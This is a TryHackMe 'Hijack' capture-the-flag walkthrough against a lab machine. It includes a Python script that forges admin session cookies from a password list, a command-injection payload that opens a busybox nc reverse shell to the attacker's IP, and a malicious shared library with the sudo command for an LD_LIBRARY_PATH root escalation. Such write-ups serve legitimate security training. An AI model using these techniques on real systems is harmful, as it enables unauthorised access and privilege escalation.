Hijack | TryHackMe WalkThrough
Running Nmap —
Findings —
Open Ports: 21, 22, 80, 111, 2049, 41591, 42689, 43971, 57924
Mounting the NFS on to the local machine —
Findings —
/mnt/share can be mounted onto the local machine
Note: A new user will be created with useradd. Switch to VM in order to prevent polluting the main OS.
Changing the user ID
Extracting the credentials from the file share after switching as the new user —
Findings —
User: ftpuser
Password: W3stV1rg1n14M0un741nM4m4
Extracting files from the FTP file server —
Findings —
- Note from the admin
- Password list
- The user admin uses a password from the list of passwords
Visiting the website hosted on port 80 —
Signing up to test the functionality of the website —
Username: alan
Password: alanalan
Logging in and capturing a request to the URL -http://10.10.135.237/index.php —
Visiting the administrator directory —
Findings —
PHPSESSID — YWxhbjo2YTc5MDJlMjMyOGE4MTlkYjVjNWRjZTM2MzExZGM2NA%3D%3D
Content-Length of a Denied Response: 51
Inspecting the session ID —
Findings —
- The session ID is base64 encoded
- Upon decoding it using the from base64 filter in cyberchef it gives the output
- alan:6a7902e2328a819db5c5dce36311dc64
- Upon cracking 6a7902e2328a819db5c5dce36311dc64 using crackstation.net it turns out to be the md5 hash of the password alanalan
- So the PHPSESSIDD is base64encoded(username:md5hash(password))
- Given the fact that the admin uses a password from the given wordlist a session ID can be constructed and this session ID can be used to session hijack the admin’s account
Brute Forcing is not feasible since there is a Rate Limiter in place —
Creating a Python script to access the administrator panel via session hijacking —
import hashlib
import base64
import requestsURL = "http://10.10.135.237/administration.php"with open ("/home/thm/hijack/.passwords_list.txt", 'r') as _f:
data = [x.strip() for x in _f.readlines()]r = requests.get(URL)
print(r)for line in data:
_hash = hashlib.md5(line.encode('utf-8')).hexdigest().encode('utf-8')
concat_str = b'admin:' + _hash
_b64hash = base64.b64encode(concat_str).decode()
print(_b64hash)
headers = { "Cookie": f"PHPSESSID={_b64hash}"}
r = requests.get(URL, headers=headers)
if len(r.text) > 51:
print("password: " + line)
print("cookie: " + _b64hash)
break
Note — Change the IP address, location to the password file if needed
Script
Execution
Findings —
Admin-
SESSID:YWRtaW46ZDY1NzNlZDczOWFlN2ZkZmIzY2VkMTk3ZDk0ODIwYTU%3D
Password:uDh3jCQsdcuLhjVkAy5x
Note: The administrator panel can be accessed by either hijacking the session by manipulating the request via burp suite or by just logging in with the acquired credentials
Step 1-Visit the administrator panel
Step 2-Capture the request in burp modify the session ID and forward it
Gained access to the admin panel —
Note: if the session is not stable just log in as admin
Command Injection Vulnerability in the admin panel — Gaining initial access —
- Using apache2 as the service that needs to be status checked
- Using the && operator to execute the reverse shell command to gain initial access
Payload: apache2 && busybox nc 10.11.50.160 9001 -e sh
Lateral Movement From www-data to rick due to information disclosure from the config.php file in the /var/www/data folder —
Gaining access as the user rick and capturing the user.txt flag —
LD_LIBRARY_PATH and Apache2 privilege escalation vector found —
Source — https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/
- The LD_LIBRARY_PATH contains a list of directories which search for shared libraries first
- Using ldd /usr/sbin/apache2. To print the shared libraries of the apache2 program,
- Use one of the shared objects in the list and we will hijack it by creating a file with the same name. For this demonstration, we will target the libcrypt.so.1 file
Creating a shared library-
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void hijack() __attribute__((constructor));void hijack() {
unsetenv("LD_LIBRARY_PATH");
setreuid(0,0);
system("/bin/bash -p");
}Compiling the C binary-
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/rick/library_path.cExecuting the exploit to gain root access-
sudo LD_LIBRARY_PATH=/tmp /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
